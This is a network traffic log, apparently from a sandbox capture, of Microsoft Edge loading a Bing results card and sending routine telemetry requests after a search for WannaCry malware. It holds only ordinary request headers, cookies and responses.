referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:46 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199026.149110b3
GET

https://www.bing.com/wiki?hash=3DA89B68261078C11D1C&order=1%2c2%2c3%2c4%2c5%2c6%2c7&width=608&open=0&accId=TopWikiRichCardV2&appNS=SERP&containsHeroSection=True&bgIndex=16%2c8%2c17%2c15%2c4%2c12%2c11&sectionLines=7%2c8%2c5%2c8%2c5%2c5%2c5&answerID=5824&DataSource=DefaultProd&iid=SERP.5824&ig=125258D7D1334F6085405077EDD48B89

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /wiki?hash=3DA89B68261078C11D1C&order=1%2c2%2c3%2c4%2c5%2c6%2c7&width=608&open=0&accId=TopWikiRichCardV2&appNS=SERP&containsHeroSection=True&bgIndex=16%2c8%2c17%2c15%2c4%2c12%2c11&sectionLines=7%2c8%2c5%2c8%2c5%2c5%2c5&answerID=5824&DataSource=DefaultProd&iid=SERP.5824&ig=125258D7D1334F6085405077EDD48B89 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1

Response

HTTP/2.0 200

cache-control: private
content-length: 24433
content-type: text/html; charset=utf-8
content-encoding: gzip
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 67117bb207fe48b8a46f776fc6ca0e10
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-oSImBNt9AfF5GKP65rFJ8dF5+Mk5UjssIjCKkNJMaeo='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: 0A2F4125B5D34AF883100D42C2D92F9F Ref B: LON601060101042 Ref C: 2024-10-17T21:03:46Z
date: Thu, 17 Oct 2024 21:03:46 GMT
set-cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE; expires=Tue, 11-Nov-2025 21:03:46 GMT; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199026.149110b2
GET

https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_tum24%22}]

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_tum24%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:46 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199026.149110b4
GET

https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_f24%22}]

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_f24%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:46 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199026.149111d4
GET

https://www.bing.com/fd/ls/l?BF=MSJ1&IG=125258D7D1334F6085405077EDD48B89&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:1}]

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?BF=MSJ1&IG=125258D7D1334F6085405077EDD48B89&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:1}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:46 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199026.149111d3
GET

https://www.bing.com/fd/ls/l?BF=MSJ0&IG=125258D7D1334F6085405077EDD48B89&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:0}]

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?BF=MSJ0&IG=125258D7D1334F6085405077EDD48B89&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:0}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1

Response

HTTP/2.0 200

expires: Mon, 21 Oct 2024 23:26:29 GMT
last-modified: Tue, 24 Sep 2024 06:13:11 GMT
etag: 0x8DCDC5FF7A41413
cache-control: public, no-transform, max-age=427258
content-length: 919
content-type: image/svg+xml
content-md5: NYaSaLcVgW1Om9AzF8DSPA==
x-ms-request-id: a0725849-901e-0014-6a2d-1529f4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.521a1202.1727961628.d8ba6842
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
date: Thu, 17 Oct 2024 21:03:46 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199026.14911216
GET

https://www.bing.com/rp/L-nYmICjtADpEJxTNradKdlXr-c.svg

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /rp/L-nYmICjtADpEJxTNradKdlXr-c.svg HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:46 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199026.149112aa
POST

https://www.bing.com/fd/ls/lsp.aspx?

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /fd/ls/lsp.aspx? HTTP/2.0
host: www.bing.com
content-length: 273
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
